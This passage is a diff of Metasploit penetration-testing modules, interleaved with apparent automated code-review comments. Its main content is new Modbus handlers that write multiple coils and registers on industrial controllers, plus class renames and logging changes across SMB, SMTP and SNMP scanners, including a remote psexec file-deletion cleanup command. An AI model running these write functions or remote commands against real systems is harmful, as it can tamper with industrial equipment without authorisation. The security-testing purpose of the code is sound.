- print_error("No answer for the READ REGISTER") + print_error("No answer for the READ REGISTERS") elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) elsif response.unpack("C*")[7] == @function_code - value = response[9..10].unpack("n")[0] - print_good("Register value at address #{datastore['DATA_ADDRESS']} : #{value}") + for i in 0..(datastore['NUMBER']-1) + values.push(response[9+2*i..10+2*i].unpack("n")[0]) + end + print_good("#{datastore['NUMBER']} register values from address #{datastore['DATA_ADDRESS']} : ") + print_good("#{values}") else print_error("Unknown answer") end @@ -162,6 +220,39 @@ class Metasploit3 < Msf::Auxiliary end end + def write_coils + @function_code = 15 + temp = datastore['DATA_COILS'] + check = temp.split("") + if temp.size > 65535 + print_error("DATA_COILS size must be between 0 and 65535") + return + end + for j in check + if j=="0" or j=="1" + else + print_error("DATA_COILS value must only contain 0s and 1s without space") + return + end + end + byte_number = (temp.size-1)/8 + 1 + data = [] + for i in 0..(byte_number-1) + data.push(temp[(i*8+0)..(i*8+7)]) + end + print_status("Sending WRITE COILS...") + response = send_frame(make_write_coils_payload(data, byte_number)) + if response.nil? + print_error("No answer for the WRITE COILS") + elsif response.unpack("C*")[7] == (0x80 | @function_code) + handle_error(response) + elsif response.unpack("C*")[7] == @function_code + print_good("Values #{datastore['DATA_COILS']} successfully written from coil address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") + end + end + def write_register @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 
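Review bot: Both read handlers index into the reply (`response[9+i].unpack("b*")` and `response[9+2*i..10+2*i].unpack("n")[0]`) without first checking that the device returned as many data bytes as NUMBER implies, so a short or malformed reply ends in a NoMethodError on nil or in nil entries in `values` instead of a clean error message. A length check before the loops, such as `if response.length < 9 + (datastore['NUMBER'] + 7) / 8` for coils and `if response.length < 9 + 2 * datastore['NUMBER']` for registers, followed by `print_error` and `return`, would cover it. Separately, the range test `datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535` rejects a read of one item at address 65535, which the error text itself calls valid; the comparison should be against 65536. The local named `loop` also shadows `Kernel#loop` and would read better as something like `last_byte`.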
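Review bot: The DATA_COILS validation in `write_coils` walks the characters with an empty `if j=="0" or j=="1"` branch and an `else` that reports the error, and it lets an empty string through, in which case `byte_number` evaluates to 0 and a write frame with no data is still sent. A single anchored match, `if temp !~ /\A[01]+\z/`, in front of the existing `print_error` and `return` replaces the loop and rejects the empty case as well. Unlike the other new handlers, this one never compares `temp.size + datastore['DATA_ADDRESS']` with the end of the address range, so that check is worth adding for consistency.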
@@ -181,18 +272,74 @@ class Metasploit3 < Msf::Auxiliary end end + def write_registers + @function_code = 16 + check = datastore['DATA_REGISTERS'].split("") + for j in 0..(check.size-1) + if check[j] == "0" or check[j]== "1" or check[j]== "2" or check[j]== "3" or check[j]== "4" or check[j]== "5" or check[j]== "6" or check[j]== "7" or check[j]== "8" or check[j]== "9" or check[j]== "," + if check[j] == "," and check[j+1] == "," + print_error("DATA_REGISTERS cannot contain two consecutive commas") + return + end + else + print_error("DATA_REGISTERS value must only contain numbers and commas without space") + return + end + end + list = datastore['DATA_REGISTERS'].split(",") + if list.size+datastore['DATA_ADDRESS'] > 65535 + print_error("Registers addresses go from 0 to 65535. You cannot go beyond.") + return + end + data = [] + for i in 0..(list.size-1) + data[i] = list[i].to_i + end + for j in 0..(data.size-1) + if data[j] < 0 || data[j] > 65535 + print_error("Each word to write must be an integer between 0 and 65535 in WRITE_REGISTERS mode") + return + end + end + print_status("Sending WRITE REGISTERS...") + response = send_frame(make_write_registers_payload(data, data.size)) + if response.nil? 
+ print_error("No answer for the WRITE REGISTERS") + elsif response.unpack("C*")[7] == (0x80 | @function_code) + handle_error(response) + elsif response.unpack("C*")[7] == @function_code + print_good("Values #{datastore['DATA_REGISTERS']} successfully written from registry address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") + end + end + def run @modbus_counter = 0x0000 # used for modbus frames connect case action.name - when "READ_COIL" - read_coil - when "READ_REGISTER" - read_register + when "READ_COILS" + read_coils + when "READ_REGISTERS" + read_registers when "WRITE_COIL" write_coil when "WRITE_REGISTER" write_register + when "WRITE_COILS" + if datastore['DATA_COILS'] == nil + print_error("The following option is needed in WRITE_COILS mode: DATA_COILS.") + return + else + write_coils + end + when "WRITE_REGISTERS" + if datastore['DATA_REGISTERS'] == nil + print_error("The following option is needed in WRITE_REGISTERS mode: DATA_REGISTERS.") + return + else + write_registers + end else print_error("Invalid ACTION") end diff --git a/modules/auxiliary/scanner/scada/modbusdetect.rb b/modules/auxiliary/scanner/scada/modbusdetect.rb index 7740955785..3eff2c7567 100644 --- a/modules/auxiliary/scanner/scada/modbusdetect.rb +++ b/modules/auxiliary/scanner/scada/modbusdetect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb index c584b0e939..d9dfc144ff 100644 --- a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report 
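Review bot: The character-by-character check in `write_registers` accepts a leading comma, so an input like `,5` is split into `["", "5"]` and `"".to_i` quietly turns the empty field into a 0 that is then written to the first register. Replacing the long `or` chain with one anchored pattern, `if datastore['DATA_REGISTERS'] !~ /\A\d+(,\d+)*\z/`, rejects leading, trailing and doubled commas in one place and makes the `check[j+1]` look-ahead unnecessary. The range test `list.size+datastore['DATA_ADDRESS'] > 65535` has the same off-by-one as the read handlers (a single write at address 65535 is refused). In `run`, `datastore['DATA_REGISTERS'] == nil` and `datastore['DATA_COILS'] == nil` would be more idiomatic as `.nil?`.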
diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index dc9bcb0b3a..9622c45419 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 134cf2a2b1..f136b4e210 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 01dc953c4e..dbfb95bb4f 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index 581283c74e..21f0ae4ff4 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index 590b4c3a46..a98910c8ca 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb 
+++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 67304ca6ba..334adfa2bf 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index b7c68054c6..b884e8ce45 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 5929b84dbf..c150e7e810 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary connect smb_login rescue StandardError => autherror - print_error("#{peer} - #{autherror}") + print_error("#{autherror}") return end 
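Review bot: After this change `print_error("#{autherror}")` and the messages in the following hunks of psexec_loggedin_users.rb no longer name the host, so unless the framework's print helpers now add the peer themselves (not visible in this diff), output from a multi-host scan cannot be attributed to a target; a one-line comment near the first call saying where the prefix now comes from would settle that. Interpolating a single value is also redundant: `print_error(autherror.to_s)`, and likewise `print_good(user)` for the `print_good("#{user}")` lines in the later hunks. Since the strings are being edited anyway, the typos `Error runing query against HKU` and `Unable to processes cleanup commands` could be fixed in the same pass. The enclosing methods start and end outside these hunks.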
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_")} return cleanout rescue StandardError => hku_error - print_error("#{peer} - Error runing query against HKU. #{hku_error.class}. #{hku_error}") + print_error("Error runing query against HKU. #{hku_error.class}. #{hku_error}") return nil end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary simple.disconnect("\\\\#{ip}\\#{smbshare}") return output rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + print_error("Error getting command output. #{output_error.class}. #{output_error}.") return false end end @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary domain = line if line.include?("USERDOMAIN") end if domain.split(" ")[2].to_s.chomp + "\\" + username.split(" ")[2].to_s.chomp == datastore['USERNAME'] - print_good("#{peer} - #{datastore['USERNAME']} is logged in") + print_good("#{datastore['USERNAME']} is logged in") report_user(datastore['USERNAME']) end return @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary end if username.length > 0 && domain.length > 0 user = domain.split(" ")[2].to_s + "\\" + username.split(" ")[2].to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) elsif logonserver.length > 0 && homepath.length > 0 uname = homepath.split('\\')[homepath.split('\\').size - 1] 
@@ -158,24 +158,24 @@ class Metasploit3 < Msf::Auxiliary uname = uname.split(".")[0] end user = logonserver.split('\\\\')[1].chomp.to_s + "\\" + uname.to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else username = query_session(smbshare, ip, cmd, text, bat) if username hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." user = "#{hostname}\\#{username}" - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else - print_status("#{peer} - Unable to determine user information for user: #{key}") + print_status("Unable to determine user information for user: #{key}") end end else - print_status("#{peer} - Could not determine logged in users") + print_status("Could not determine logged in users") end rescue Rex::Proto::SMB::Exceptions::Error => check_error - print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") + print_error("Error checking reg key. #{check_error.class}. #{check_error}") return check_error end end @@ -185,12 +185,12 @@ class Metasploit3 < Msf::Auxiliary begin # Try and do cleanup command cleanup = "#{cmd} /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup") + print_status("Executing cleanup") out = psexec(cleanup) rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands: #{cleanuperror}") - print_warning("#{peer} - Maybe %SYSTEMDRIVE%#{text} must be deleted manually") - print_warning("#{peer} - Maybe #{bat} must be deleted manually") + print_error("Unable to processes cleanup commands: #{cleanuperror}") + print_warning("Maybe %SYSTEMDRIVE%#{text} must be deleted manually") + print_warning("Maybe #{bat} must be deleted manually") return cleanuperror end end diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index d145bd5b26..f54004bbe9 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should go first include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb index 1100dd05c1..e33bc911d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb +++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index e4118ded74..cb1f1081d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client @@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary end subdirs.shift end - print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true + print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] end unless detailed_tbl.rows.empty? if datastore['LogSpider'] == '1' diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 3238c66dfc..172746cbb8 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client 
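Review bot: In smb_enumshares.rb, replacing `unless datastore['ShowFiles'] == true` with `unless datastore['ShowFiles']` changes behaviour if the option can ever hold a non-boolean value: any non-nil value, including the string "false", now suppresses the "Spider complete" message. The context line `datastore['LogSpider'] == '1'` in the same hunk suggests some options in this module are compared as strings, so it is worth confirming that ShowFiles is registered as a boolean option and normalised before this line. If it is, a short comment such as `# ShowFiles is an OptBool, so plain truthiness is safe here` would document the assumption. The enclosing method starts outside the hunk.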
diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index e8775e681f..6867ca1d20 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0fdf529ca7..1fe83ba462 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smb' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index eddfc7c841..e440845a29 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index abed2f4c4f..9ffcc26c16 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC 
@@ -255,13 +255,13 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" case check_host(ip) when Exploit::CheckCode::Vulnerable - print_good("#{peer} - The target is vulnerable to CVE-2015-0240.") + print_good("The target is vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Appears - print_good("#{peer} - The target appears to be vulnerable to CVE-2015-0240.") + print_good("The target appears to be vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Detected - print_status("#{peer} - The target appears to be running Samba.") + print_status("The target appears to be running Samba.") else - print_status("#{peer} - The target appears to be safe") + print_status("The target appears to be safe") end end diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index 9a1c016918..779de20c9f 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 7ff74bee87..ba2a9d2604 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb index eae920be73..e259235d43 100644 --- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb +++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report 
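Review bot: In smb_uninit_cred.rb, the `peer = "#{ip}:#{rport}"` assignment kept as the first context line is no longer read by any of the four messages now that the `#{peer} - ` prefix is gone, so it is probably a dead local. The enclosing method starts and ends outside the hunk, so check that nothing further down still uses `peer` before deleting it.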
diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index 1c5be24aad..cc85ccee35 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary begin connect banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) - print_status("#{peer} - SMTP #{banner_sanitized}") + print_status("SMTP #{banner_sanitized}") report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner) if datastore['EXTENDED'] @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary do_test_relay(nil, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>") end rescue - print_error("#{peer} - Unable to establish an SMTP session") + print_error("Unable to establish an SMTP session") return end end 
@@ -86,36 +86,36 @@ class Metasploit3 < Msf::Auxiliary connect res = raw_send_recv("EHLO X\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailfrom}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailto}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("DATA\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") if res =~ /250/ if testnumber.nil? - print_good("#{peer} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") else - print_good("#{peer} - Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") end else if testnumber.nil? - print_status "#{peer} - No relay detected" + print_status "No relay detected" else - print_status "#{peer} - Test ##{testnumber} - No relay detected" + print_status "Test ##{testnumber} - No relay detected" end end rescue - print_error("#{peer} - Test ##{testnumber} - Unable to establish an SMTP session") + print_error("Test ##{testnumber} - Unable to establish an SMTP session") return end end diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index 54069a0dfb..6e6369efe3 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner 
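Review bot: In smtp_relay.rb, the five `vprint_status("#{res.inspect}")` calls interpolate a value that is already a String; `vprint_status(res.inspect)` is equivalent without the wrapper. The final `rescue` message formats `Test ##{testnumber}` unconditionally, so a call with `testnumber` nil prints an empty test number, whereas the branches above it check `testnumber.nil?` first. The bare `rescue` also reports every StandardError as `Unable to establish an SMTP session`, which can hide a non-network bug; naming the expected exception classes would keep the two apart. The method body starts outside the hunk.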
diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 99d8353ee0..e75cd693f7 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/arris_dg950.rb b/modules/auxiliary/scanner/snmp/arris_dg950.rb index a071e85520..91efc6d3b9 100644 --- a/modules/auxiliary/scanner/snmp/arris_dg950.rb +++ b/modules/auxiliary/scanner/snmp/arris_dg950.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index f78cc130b9..7921276cb0 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 6f4172e35d..f0c7d77486 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index bad6580176..0a7f640504 100644 
--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 8fe98c4273..8af295c94c 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb index 904d5e8b0f..1e09a58b45 100644 --- a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb +++ b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 07530dafd5..ee6725b32a 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index dd54f5cd9e..596b5b508b 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 8886a67ae8..55ea5142b4 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 34a0940b48..e763078560 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index 980c437f15..ecc44d8fac 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/community_string_collection' require 'metasploit/framework/login_scanner/snmp' -class 